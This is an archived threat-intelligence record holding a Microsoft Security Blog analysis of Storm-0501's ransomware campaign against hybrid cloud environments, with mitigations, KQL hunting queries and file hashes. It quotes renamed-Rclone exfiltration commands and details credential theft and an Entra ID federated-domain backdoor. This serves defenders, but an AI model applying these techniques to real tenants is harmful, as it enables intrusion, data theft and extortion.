{
	"id": "c4c00ab8-900d-4332-95b2-a96de07f68f9",
	"created_at": "2026-04-06T00:21:43.725095Z",
	"updated_at": "2026-04-10T03:36:19.226814Z",
	"deleted_at": null,
	"sha1_hash": "aa876d3205880558d4244c07bff002c63906d9c8",
	"title": "Storm-0501: Ransomware attacks expanding to hybrid cloud environments | Microsoft Security Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 322431,
	"plain_text": "Storm-0501: Ransomware attacks expanding to hybrid cloud\r\nenvironments | Microsoft Security Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2024-09-26 · Archived: 2026-04-05 12:45:46 UTC\r\nAugust 27, 2025 update: Storm-0501 has continuously evolved to achieve sharpened focus on cloud-based TTPs as their\r\nprimary objective shifted from deploying on-premises endpoint ransomware to using cloud-based ransomware tactics.\r\nLeveraging cloud-native capabilities, Storm-0501 rapidly exfiltrates large volumes of data, destroys data and backups within\r\nthe victim environment, and demands ransom—all without relying on traditional malware deployment. Read our latest blog\r\non this threat actor: Storm-0501’s evolving techniques lead to cloud-based ransomware.\r\nMicrosoft has observed the threat actor tracked as Storm-0501 launching a multi-staged attack where they compromised\r\nhybrid cloud environments and performed lateral movement from on-premises to cloud environment, leading to data\r\nexfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment. The said attack targeted\r\nmultiple sectors in the United States, including government, manufacturing, transportation, and law enforcement. Storm-0501 is a financially motivated cybercriminal group that uses commodity and open-source tools to conduct ransomware\r\noperations.\r\nStorm-0501 has been active as early as 2021, initially observed deploying the Sabbath(54bb47h) ransomware in attacks\r\ntargeting US school districts, publicly leaking data for extortion, and even directly messaging school staff and parents. 
Since\r\nthen, most of the threat actor’s attacks have been opportunistic, as the group began operating as a ransomware-as-a-service\r\n(RaaS) affiliate deploying multiple ransomware payloads developed and maintained by other threat actors over the years,\r\nincluding Hive, BlackCat (ALPHV), Hunters International, LockBit, and most recently, Embargo ransomware. The threat\r\nactor was also recently observed targeting hospitals in the US.\r\nStorm-0501 is the latest threat actor observed to exploit weak credentials and over-privileged accounts to move from\r\norganizations’ on-premises environments to cloud environments. They stole credentials and used them to gain control of the\r\nnetwork, eventually creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises environment. Microsoft previously observed threat actors such as Octo Tempest and Manatee Tempest targeting both on-premises and cloud environments and exploiting the interfaces between the environments to achieve their goals.\r\nAs hybrid cloud environments become more prevalent, the challenge of securing resources across multiple platforms grows\r\never more critical for organizations. Microsoft is committed to helping customers understand these attacks and build\r\neffective defenses against them.\r\nIn this blog post, we will go over Storm-0501’s tactics, techniques, and procedures (TTPs), typical attack methods, and\r\nexpansion to the cloud. We will also provide information on how Microsoft detects activities related to this kind of attack, as\r\nwell as provide mitigation guidance to help defenders protect their environment.\r\nFigure 1. 
Storm-0501 attack chain\r\nAnalysis of the recent Storm-0501 campaign\r\nOn-premises compromise\r\nInitial access and reconnaissance\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 1 of 9\n\nStorm-0501 previously achieved initial access through intrusions facilitated by access brokers like Storm-0249 and Storm-0900, leveraging compromised (possibly stolen) credentials to sign in to the target system, or exploiting various known\r\nremote code execution vulnerabilities in unpatched public-facing servers. In a recent campaign, Storm-0501 exploited\r\nknown vulnerabilities in Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler (CVE-2023-4966), and ColdFusion\r\n2016 application (possibly CVE-2023-29300 or CVE-2023-38203). In cases observed by Microsoft, these initial access\r\ntechniques, combined with insufficient operational security practices by the targets, provided the threat actor with\r\nadministrative privileges on the target device.\r\nAfter gaining initial access and code execution capabilities on the affected device in the network, the threat actor performed\r\nextensive discovery to find potential desirable targets such as high-value assets and general domain information like Domain\r\nAdministrator users and domain forest trusts. Common native Windows tools and commands, such as systeminfo.exe, net.exe,\r\nnltest.exe, and tasklist.exe, were leveraged in this phase. The threat actor also utilized open-source tools like ossec-win32 and\r\nOSQuery to query additional endpoint information. 
Additionally, in some of the attacks, we observed the threat actor\r\nrunning an obfuscated version of ADRecon.ps1 called obfs.ps1 or recon.ps1 for Active Directory reconnaissance.\r\nFollowing initial access and reconnaissance, the threat actor deployed several remote monitoring and management tools\r\n(RMMs), such as Level.io, AnyDesk, and NinjaOne to interact with the compromised device and maintain persistence.\r\nCredential access and lateral movement\r\nThe threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted\r\nto gain access to more accounts within the network through several methods. The threat actor primarily utilized Impacket’s\r\nSecretsDump module, which extracts credentials over the network, and leveraged it across an extensive number of devices\r\nto obtain credentials. The threat actor used the compromised credentials to access more devices in the network and then\r\nleveraged Impacket again to collect additional credentials. The threat actor then repeated this process until they\r\ncompromised a large set of credentials that potentially included multiple Domain Admin credentials.\r\nIn addition, the threat actor was observed attempting to gather secrets by reading sensitive files and in some cases gathering\r\nKeePass secrets from the compromised devices. The threat actor used EncryptedStore’s Find-KeePassConfig.ps1\r\nPowerShell script to output the database location and keyfile/user master key information and launch the KeePass\r\nexecutable to gather the credentials. 
We assess with medium confidence that the threat actor also performed extensive brute\r\nforce activity on a few occasions to gain additional credentials for specific accounts.\r\nThe threat actor was observed leveraging Cobalt Strike to move laterally across the network using the compromised\r\ncredentials and using the tool’s command-and-control (C2) capabilities to directly communicate with the endpoints and send\r\nfurther commands. The common Cobalt Strike Beacon file types used in these campaigns were .dll files and .ocx files that\r\nwere launched by rundll32.exe and regsvr32.exe respectively. Moreover, the “license_id” associated with this Cobalt Strike\r\nBeacon is “666”. The “license_id” field is commonly referred to as the Watermark and is a nine-digit value that is unique\r\nper legitimate license provided by Cobalt Strike. In this case, the “license_id” was modified to a unique 3-digit value in all\r\nthe beacon configurations.\r\nIn cases we observed, the threat actor’s lateral movement across the campaign ended with a Domain Admin compromise and\r\naccess to a Domain Controller that eventually enabled them to deploy ransomware across the devices in the network.\r\nData collection and exfiltration\r\nThe threat actor was observed exfiltrating sensitive data from compromised devices. To exfiltrate data, the threat actor used\r\nthe open-source tool Rclone and renamed it to known Windows binary names or variations of them, such as svhost.exe or\r\nscvhost.exe, as a masquerading technique. The threat actor employed the renamed Rclone binaries to transfer data to the cloud,\r\nusing a dedicated configuration that synchronized files to public cloud storage services such as MegaSync across multiple\r\nthreads. 
The following command lines used by the threat actor demonstrate this behavior:\r\nSvhost.exe copy --filter-from [REDACTED] [REDACTED] config:[REDACTED] -q --ignore-existing --auto-confirm\r\n--multi-thread-streams 11 --transfers 11\r\nscvhost.exe --config C:\\Windows\\Debug\\a.conf copy [REDACTED UNC PATH] [REDACTED]\r\nDefense evasion\r\nThe threat actor attempted to evade detection by tampering with security products on some of the devices they got hands-on-keyboard access to. They employed an open-source tool, resorted to PowerShell cmdlets and existing binaries to evade\r\ndetection, and in some cases, distributed Group Policy Object (GPO) policies to tamper with security products.\r\nOn-premises to cloud pivot\r\nIn their recent campaign, we noticed a shift in Storm-0501’s methods. The threat actor used the credentials, specifically\r\nMicrosoft Entra ID (formerly Azure AD) credentials, that were stolen earlier in the attack to move laterally from the on-premises\r\nto the cloud environment and establish persistent access to the target network through a backdoor.\r\nStorm-0501 was observed using the following attack vectors and pivot points on the on-premises side to gain subsequent\r\ncontrol in Microsoft Entra ID:\r\nMicrosoft Entra Connect Sync account compromise\r\nMicrosoft Entra Connect, previously known as Azure AD Connect, is an on-premises Microsoft application that plays a\r\ncritical role in synchronizing passwords and sensitive data between Active Directory (AD) objects and Microsoft Entra ID\r\nobjects. Microsoft Entra Connect synchronizes the on-premises identity and Microsoft Entra identity of a user account to\r\nallow the user to sign in to both realms with the same password. To deploy Microsoft Entra Connect, the application must be\r\ninstalled on an on-premises server or an Azure VM. 
To decrease the attack surface, Microsoft recommends that\r\norganizations deploy Microsoft Entra Connect on a domain-joined server and restrict administrative access to domain\r\nadministrators or other tightly controlled security groups. Microsoft Incident Response also published recommendations on\r\npreventing cloud identity compromise.\r\nMicrosoft Entra Connect Sync is a component of Microsoft Entra Connect that synchronizes identity data between on-premises environments and Microsoft Entra ID. During the Microsoft Entra Connect installation process, at least two new\r\naccounts (more accounts are created if there are multiple forests) responsible for the synchronization are created, one in the\r\non-premises AD realm and the other in the Microsoft Entra ID tenant. These service accounts are responsible for the\r\nsynchronization process.\r\nThe on-premises account name is prefixed with “MSOL_” and has permissions to replicate directory changes, modify\r\npasswords, modify users, modify groups, and more (see full permissions here).\r\nFigure 2. The on-premises account name\r\nThe cloud Microsoft Entra ID account is prefixed with “sync_\u003cEntra Connect server name\u003e_” and has the account display\r\nname set to “On-Premises Directory Synchronization Service Account”. This user account is assigned with the Directory\r\nSynchronization Accounts role (see detailed permissions of this role here). Microsoft recently implemented a change in\r\nMicrosoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra\r\nConnect Sync and Microsoft Entra Cloud Sync and helps prevent abuse.\r\nFigure 3. The cloud account name\r\nThe on-premises and cloud service accounts conduct the syncing operation every few minutes, similar to Password Hash\r\nSynchronization (PHS), to uphold real time user experience. 
Both user accounts mentioned above are crucial for the\r\nMicrosoft Entra Connect Sync service operations and their credentials are saved encrypted via DPAPI (Data Protection API)\r\non the server’s disk or a remote SQL server.\r\nWe can assess with high confidence that in the recent Storm-0501 campaign, the threat actor specifically located Microsoft\r\nEntra Connect Sync servers and managed to extract the plain text credentials of the Microsoft Entra Connect cloud and on-premises sync accounts. We assess that the threat actor was able to achieve this because of the previous malicious activities\r\ndescribed in this blog post, such as using Impacket to steal credentials and DPAPI encryption keys, and tampering with\r\nsecurity products.\r\nFollowing the compromise of the cloud Directory Synchronization Account, the threat actor can authenticate using the clear\r\ntext credentials and get an access token to Microsoft Graph. The compromise of the Microsoft Entra Connect Sync account\r\npresents a high risk to the target, as it can allow the threat actor to set or change Microsoft Entra ID passwords of any hybrid\r\naccount (on-premises account that is synced to Microsoft Entra ID).\r\nCloud session hijacking of on-premises user account\r\nAnother way to pivot from on-premises to Microsoft Entra ID is to gain control of an on-premises user account that has a\r\nrespective user account in the cloud. In some of the Storm-0501 cases we investigated, at least one of the Domain Admin\r\naccounts that was compromised had a respective account in Microsoft Entra ID, with multifactor authentication (MFA)\r\ndisabled, and assigned with a Global Administrator role. It is important to mention that the sync service is unavailable for\r\nadministrative accounts in Microsoft Entra, hence the passwords and other data are not synced from the on-premises account\r\nto the Microsoft Entra account in this case. 
However, if the passwords for both accounts are the same, or obtainable by on-premises credential theft techniques (such as web browser password stores), then the pivot is possible.\r\nIf a compromised on-premises user account is not assigned an administrative role in Microsoft Entra ID and is synced\r\nto the cloud and no security boundaries such as MFA or Conditional Access are set, then the threat actor could escalate to the\r\ncloud through the following:\r\n1. If the password is known, then logging in to Microsoft Entra is possible from any device.\r\n2. If the password is unknown, the threat actor can reset the on-premises user password, and after a few minutes the\r\nnew password will be synced to the cloud.\r\n3. If they hold credentials of a compromised Microsoft Entra Directory Synchronization Account, they can set the cloud\r\npassword using AADInternals’ Set-AADIntUserPassword cmdlet.\r\nIf MFA for that user account is enabled, then authenticating as the user will require the threat actor to tamper with the\r\nMFA or gain control of a device owned by the user and subsequently hijack its cloud session or extract its Microsoft Entra\r\naccess tokens along with their MFA claims.\r\nMFA is a security practice that requires users to provide two or more verification factors to gain access to a resource and is a\r\nrecommended security practice for all users, especially for privileged administrators. A lack of MFA or Conditional Access\r\npolicies limiting the sign-in options opens a wide door of possibilities for the attacker to pivot to the cloud environment,\r\nespecially if the user has administrative privileges. 
To increase the security of admin accounts, Microsoft is rolling out\r\nadditional tenant-level security measures to require MFA for all Azure users.\r\nImpact\r\nCloud compromise leading to backdoor\r\nFollowing a successful pivot from the on-premises environment to the cloud through the compromised Microsoft Entra\r\nConnect Sync user account or the cloud admin account compromised through cloud session hijacking, the threat actor was\r\nable to connect to Microsoft Entra (portal/MS Graph) from any device, using a privileged Microsoft Entra ID account, such\r\nas a Global Administrator, and was no longer limited to the compromised devices.\r\nOnce Global Administrator access was available to Storm-0501, we observed them creating persistent backdoor access for\r\nlater use by creating a new federated domain in the tenant. This backdoor enables an attacker to sign in as any user of the\r\ncompromised Microsoft Entra ID tenant if the Microsoft Entra ID user property ImmutableId is known or set by the attackers. For\r\nusers that are configured to be synced by the Microsoft Entra Connect service, the ImmutableId property is automatically\r\npopulated, while for users that are not synced the default value is null. However, users with administrative privileges can add\r\nan ImmutableId value, regardless.\r\nThe threat actor used the open-source tool AADInternals and its Microsoft Entra ID capabilities to create the backdoor.\r\nAADInternals is a PowerShell module designed for security researchers and penetration testers that provides various\r\nmethods for interacting with and testing Microsoft Entra ID, and it is commonly used by Storm-0501. To create the backdoor, the\r\nthreat actor first needed to have a domain of their own that is registered to Microsoft Entra ID. The attacker’s next step is to\r\ndetermine whether the target domain is managed or federated. 
A federated domain in Microsoft Entra ID is a domain that is\r\nconfigured to use federation technologies, such as Active Directory Federation Services (AD FS), to authenticate users. If\r\nthe target domain is managed, then the attackers need to convert it to a federated one and provide a root certificate to sign\r\nfuture tokens upon user authentication and authorization processes. If the target domain is already federated, then the\r\nattackers need to add the root certificate as “NextSigningCertificate”.\r\nOnce a backdoor domain is available for use, the threat actor creates a federation trust between the compromised tenant and\r\ntheir own tenant. The threat actor uses the AADInternals commands that enable the creation of Security Assertion Markup\r\nLanguage (SAML or SAML2) tokens, which can be used to impersonate any user in the organization and bypass MFA to\r\nsign in to any application. Microsoft observed the actor using the SAML token to sign in to Office 365.\r\nOn-premises compromise leading to ransomware\r\nOnce the threat actor achieved sufficient control over the network, successfully extracted sensitive files, and managed to\r\nmove laterally to the cloud environment, the threat actor then deployed the Embargo ransomware across the organization.\r\nWe observed that the threat actor did not always resort to ransomware distribution, and in some cases only maintained\r\nbackdoor access to the network.\r\nEmbargo ransomware is a new strain developed in Rust, known to use advanced encryption methods. Operating under the\r\nRaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks\r\nin exchange for a share of the ransom. 
Embargo affiliates employ double extortion tactics, where they first encrypt a victim’s\r\nfiles and then threaten to leak stolen sensitive data unless a ransom is paid.\r\nIn the cases observed by Microsoft, the threat actor leveraged compromised Domain Admin accounts to distribute the\r\nEmbargo ransomware via a scheduled task named “SysUpdate” that was registered via GPO on the devices in the network.\r\nThe ransomware binary names used were PostalScanImporter.exe and win.exe. Once the files on the target\r\ndevices were encrypted, the encrypted files’ extensions changed to .partial, .564ba1, and .embargo.\r\nMitigation and protection guidance\r\nMicrosoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization\r\nAccounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync as part of ongoing security\r\nhardening. This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks.\r\nCustomers may also refer to Microsoft’s human-operated ransomware overview for general hardening recommendations\r\nagainst ransomware attacks.\r\nThe other techniques used by threat actors and described in this blog can be mitigated by adopting the following security\r\nmeasures:\r\nSecure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity\r\nin your Microsoft Entra ID environments to slow and stop attackers.\r\nEnable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user\r\nattempts to sign in. 
Organizations can protect themselves from attacks that leverage stolen credentials by enabling\r\npolicies such as device compliance or trusted IP address requirements.\r\nSet a Conditional Access policy to limit the access of Microsoft Entra ID sync accounts from untrusted IP\r\naddresses to all cloud apps. The Microsoft Entra ID sync account is identified by having the role ‘Directory\r\nSynchronization Accounts’. Refer to the Advanced hunting section and check the relevant query to get\r\nthose IP addresses.\r\nImplement Conditional Access authentication strength to require phishing-resistant authentication for employees and\r\nexternal users for critical apps.\r\nFollow Microsoft’s best practices for securing Active Directory Federation Services.\r\nRefer to Azure Identity Management and access control security best practices for further steps and recommendations\r\nto manage, design, and secure your Azure AD environment.\r\nEnsure Microsoft Defender for Cloud Apps connectors are turned on for your organization to receive alerts on the\r\nMicrosoft Entra ID sync account and all other users.\r\nEnable protection to prevent bypassing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID.\r\nSet the validatingDomains property of federatedTokenValidationPolicy to “all” to block attempts to sign in to any\r\nnon-federated domain (like .onmicrosoft.com) with SAML tokens.\r\nTurn on Microsoft Entra ID Protection to monitor identity-based risks and create risk-based Conditional Access\r\npolicies to remediate risky sign-ins.\r\nTurn on tamper protection features to prevent attackers from stopping security services such as Microsoft Defender\r\nfor Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.\r\nRefer to the recommendations in our attacker technique profile, including use of Windows Defender Application\r\nControl or AppLocker to create policies to block 
unapproved information technology (IT) management tools to\r\nprotect against the abuse of legitimate remote management tools like AnyDesk or Level.io.\r\nRun endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious\r\nartifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is\r\nrunning in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.\r\nTurn on investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate\r\naction on alerts, significantly reducing alert volume.\r\nDetection details\r\nAlerts with the following names can be used when investigating the current campaign of Storm-0501.\r\nMicrosoft Defender XDR detections\r\nMicrosoft Defender Antivirus\r\nMicrosoft Defender Antivirus detects the Cobalt Strike Beacon as the following:\r\nBehavior:Win32/CobaltStrike\r\nBackdoor:Win64/CobaltStrike\r\nHackTool:Win64/CobaltStrike\r\nAdditional Cobalt Strike components are detected as the following:\r\nTrojanDropper:PowerShell/Cobacis\r\nTrojan:Win64/TurtleLoader.CS\r\nExploit:Win32/ShellCode.BN\r\nMicrosoft Defender Antivirus detects tools that enable Microsoft Entra ID enumeration as the following malware:\r\nBackdoor:Win32/SuspAadInternalsUsage\r\nEmbargo ransomware threat components are detected as the following:\r\nRansom:Win32/Embargo\r\nMicrosoft Defender for Endpoint\r\nAlerts with the following titles in the security center can indicate threat activity related to Storm-0501 on your network:\r\nRansomware-linked Storm-0501 threat actor detected\r\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by\r\nunrelated threat activity and are not monitored in the status cards provided with this report. \r\nPossible Adobe ColdFusion vulnerability exploitation\r\nCompromised account conducting hands-on-keyboard attack\r\nOngoing hands-on-keyboard attacker activity detected (Cobalt Strike)\r\nOngoing hands-on-keyboard attack via Impacket toolkit\r\nSuspicious Microsoft Defender Antivirus exclusion\r\nAttempt to turn off Microsoft Defender Antivirus protection\r\nRenaming of legitimate tools for possible data exfiltration\r\nBlackCat ransomware\r\n‘Embargo’ ransomware was detected and was active\r\nSuspicious Group Policy action detected\r\nAn active ‘Embargo’ ransomware was detected\r\nThe following alerts might indicate on-premises to cloud pivot through Microsoft Entra Connect:\r\nEntra Connect Sync credentials extraction attempt\r\nSuspicious cmdlets launch using AADInternals\r\nPotential Entra Connect Tampering\r\nIndication of local security authority secrets theft\r\nMicrosoft Defender for Identity\r\nThe following Microsoft Defender for Identity alerts can indicate activity related to this threat:\r\nData exfiltration over SMB\r\nSuspected DCSync attack\r\nMicrosoft Defender for Cloud Apps\r\nMicrosoft Defender for Cloud Apps can detect abuse of permissions in Microsoft Entra ID and other cloud apps. 
Activities\r\nrelated to the Storm-0501 campaign described in this blog are detected as the following:\r\nBackdoor creation using AADInternals tool\r\nCompromised Microsoft Entra ID Cloud Sync account\r\nSuspicious sign-in to Microsoft Entra Connect Sync account\r\nEntra Connect Sync account suspicious activity following a suspicious login\r\nAADInternals tool used by a Microsoft Entra Sync account\r\nSuspicious login from AADInternals tool\r\nMicrosoft Defender Vulnerability Management\r\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in\r\nthis threat:\r\nCVE-2022-47966\r\nThreat intelligence reports\r\nMicrosoft customers can use the following reports in Microsoft Defender Threat Intelligence to get the most up-to-date\r\ninformation about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the\r\nintelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in\r\ncustomer environments:\r\nStorm-0501\r\nAdvanced hunting\r\nMicrosoft Defender XDR\r\nMicrosoft Defender XDR customers can run the following queries to find related activity in their networks:\r\nMicrosoft Entra Connect Sync account exploration\r\nExplore sign-in activity from IdentityLogonEvents and look for uncommon behavior, such as sign-ins from newly seen IP\r\naddresses or sign-ins to new applications that are not sync related.\r\nIdentityLogonEvents\r\n| where Timestamp \u003e ago(30d)\r\n| where AccountDisplayName contains \"On-Premises Directory Synchronization Service Account\"\r\n| extend ApplicationName = tostring(RawEventData.ApplicationName)\r\n| project-reorder Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, ApplicationName,\r\nOSPlatform, 
DeviceType\r\nUsually, the activity of the sync account is repetitive, coming from the same IP address to the same application, and any\r\ndeviation from the natural flow is worth investigating. Cloud applications that are normally accessed by the Microsoft Entra ID\r\nsync account are “Microsoft Azure Active Directory Connect”, “Windows Azure Active Directory”, and “Microsoft Online\r\nSyndication Partner Portal”.\r\nExplore the cloud activity (a.k.a. ActionType) of the sync account in the same way as above; this account by nature performs a certain\r\nset of actions including ‘update User.’, ‘update Device.’ and so on. New and uncommon activity from this user might\r\nindicate interactive use of the account; even though it could have been from someone inside the organization, it could also\r\nbe the threat actor.\r\nCloudAppEvents\r\n| where Timestamp \u003e ago(30d)\r\n| where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\"\r\n| extend Workload = RawEventData.Workload\r\n| project-reorder Timestamp, IPAddress, AccountObjectId, ActionType, Application, Workload, DeviceType,\r\nOSPlatform, UserAgent, ISP\r\nPay close attention to actions from different DeviceTypes or OSPlatforms; this account’s automated service runs from\r\none specific machine, so there shouldn’t be any variety in these fields.\r\nCheck which IP addresses the Microsoft Entra Connect Sync account uses\r\nThis query reveals all IP addresses that the default Microsoft Entra Connect Sync account uses, so those could be added as\r\ntrusted IP addresses for the Entra ID sync account (make sure the account is not compromised before relying on this list).\r\nIdentityLogonEvents\r\n| where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\"\r\n| where ActionType == \"LogonSuccess\"\r\n| distinct IPAddress\r\n| union (CloudAppEvents\r\n| where AccountDisplayName has \"On-Premises Directory Synchronization Service Account\"\r\n| distinct IPAddress)\r\n| distinct 
IPAddress\r\nFederation and authentication domain changes\r\nExplore the addition of a new authentication or federation domain, and validate that the new domain is a valid one and was\r\npurposefully added.\r\nCloudAppEvents\r\n| where Timestamp \u003e ago(30d)\r\n| where ActionType in (\"Set domain authentication.\", \"Set federation settings on domain.\")\r\nMicrosoft Sentinel\r\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to\r\nautomatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map\r\nanalytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel\r\nContent Hub to have the analytics rule deployed in their Sentinel workspace.\r\nAssess your environment for ManageEngine, NetScaler, and ColdFusion vulnerabilities.\r\nDeviceTvmSoftwareVulnerabilities\r\n| where CveId in (\"CVE-2022-47966\",\"CVE-2023-4966\",\"CVE-2023-29300\",\"CVE-2023-38203\")\r\n| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,\r\nCveId,VulnerabilitySeverityLevel\r\n| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId,\r\nCvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware\r\n) on CveId\r\n| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,\r\nCveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware\r\nSearch for file IOCs\r\nlet selectedTimestamp = datetime(2024-09-17T00:00:00.0000000Z);\r\nlet fileName 
=\r\ndynamic([\"PostalScanImporter.exe\",\"win.exe\",\"name.dll\",\"248.dll\",\"cs240.dll\",\"fel.ocx\",\"theme.ocx\",\"hana.ocx\",\"obfs.ps1\",\"recon.ps1\"]);\r\nlet FileSHA256 =\r\ndynamic([\"efb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d\",\"a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc63729\r\nsearch in\r\n(AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents,\r\nDeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAtta\r\nTimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from September 17th runs the\r\nsearch for 90 days, change the selectedTimestamp accordingly. and (FileName in (fileName) or OldFileName in\r\n(fileName) or ProfileName in (fileName) or InitiatingProcessFileName in (fileName) or\r\nInitiatingProcessParentFileName in (fileName) or InitiatingProcessVersionInfoInternalFileName in (fileName)\r\nor InitiatingProcessVersionInfoOriginalFileName in (fileName) or PreviousFileName in (fileName) or\r\nProcessVersionInfoInternalFileName in (fileName) or ProcessVersionInfoOriginalFileName in (fileName) or\r\nDestinationFileName in (fileName) or SourceFileName in (fileName)or ServiceFileName in (fileName) or SHA256 in\r\n(FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))\r\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post\r\nexploitation activity detailed in this blog, in addition to Microsoft Defender XDR detections list above.\r\nRemote Management Monitoring Network Connections\r\nLevel.io RMM File Signature\r\nAnyDesk RMM File Signature\r\nNinjaOne RMM File Signature\r\nPotential Impacket Execution\r\nPotential ransomware activity related to Cobalt Strike\r\nCobalt DNS Beacon\r\nC2-NamedPipe\r\nRenamed Rclone Exfiltration\r\nDisable Or Modify Windows 
Defender\r\nClearing of forensic evidence from event logs using wevtutil\r\nSuspicious Signin By AAD Connect Account\r\nIndicators of compromise (IOCs)\r\nThe following list provides indicators of compromise (IOCs) observed during our investigation. We encourage our\r\ncustomers to investigate these indicators within their environments and implement detections and protections to identify any\r\npast related activity and prevent future attacks against their systems.\r\nFile name SHA-256 Description\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 8 of 9\n\nPostalScanImporter.exe,\r\nwin.exe\r\nefb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d\r\nEmbargo\r\nransomware\r\nwin.exe a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc637293a40\r\nEmbargo\r\nransomware\r\nname.dll caa21a8f13a0b77ff5808ad7725ff3af9b74ce5b67426c84538b8fa43820a031\r\nCobalt\r\nStrike\r\n248.dll d37dc37fdcebbe0d265b8afad24198998ae8c3b2c6603a9258200ea8a1bd7b4a\r\nCobalt\r\nStrike\r\ncs240.dll 53e2dec3e16a0ff000a8c8c279eeeca8b4437edb8ec8462bfbd9f64ded8072d9\r\nCobalt\r\nStrike\r\nfel.ocx 827f7178802b2e92988d7cff349648f334bc86317b0b628f4bb9264285fccf5f\r\nCobalt\r\nStrike\r\ntheme.ocx ee80f3e3ad43a283cbc83992e235e4c1b03ff3437c880be02ab1d15d92a8348a\r\nCobalt\r\nStrike\r\nhana.ocx de09ec092b11a1396613846f6b082e1e1ee16ea270c895ec6e4f553a13716304\r\nCobalt\r\nStrike\r\nobfs.ps1 d065623a7d943c6e5a20ca9667aa3c41e639e153600e26ca0af5d7c643384670 ADRecon\r\nrecon.ps1 c08dd490860b54ae20fa9090274da9ffa1ba163f00d1e462e913cf8c68c11ac1 ADRecon\r\nReferences\r\nThe Rust Revolution: New Embargo Ransomware Steps In – Cyble\r\nEmbargo Ransomware Group: The Interview (suspectfile.com)\r\nhttps://aadinternals.com/post/aadbackdoor/\r\nhttps://aadinternals.com/post/aad-deepdive/\r\nOmri Refaeli, Tafat Gaspar, Vaibhav Deshmukh, Naya Hashem, Charles-Edouard Bettan\r\nMicrosoft Threat Intelligence 
Community\r\nLearn more\r\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat\r\nIntelligence Blog: https://aka.ms/threatintelblog.\r\nTo get notified about new publications and to join discussions on social media, follow us on LinkedIn at\r\nhttps://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter)\r\nat https://twitter.com/MsftSecIntel.\r\nTo hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape,\r\nlisten to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.\r\nSource: https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nhttps://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"MITRE"
	],
	"references": [
		"https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/"
	],
	"report_names": [
		"storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
